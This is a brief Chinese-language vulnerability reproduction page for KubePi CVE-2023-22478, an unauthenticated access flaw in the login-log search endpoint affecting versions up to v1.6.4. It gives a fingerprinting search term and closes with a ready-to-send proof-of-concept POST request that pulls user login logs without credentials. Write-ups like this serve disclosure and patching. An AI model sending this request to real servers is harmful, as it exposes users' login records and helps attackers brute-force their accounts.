跳转至

KubePi LoginLogsSearch 未授权访问漏洞 CVE-2023-22478

漏洞描述

KubePi LoginLogsSearch 方法下的接口存在未授权访问漏洞,攻击者通过漏洞可以未授权获取用户的登录日志信息,进一步爆破用户

漏洞影响

KubePi <= v1.6.4

网络测绘

"kubepi"

漏洞复现

登录页面

img

补丁中对路由加了身份验证

img

对应的接口为

img

验证POC

POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
Content-Type: application/json

{}

img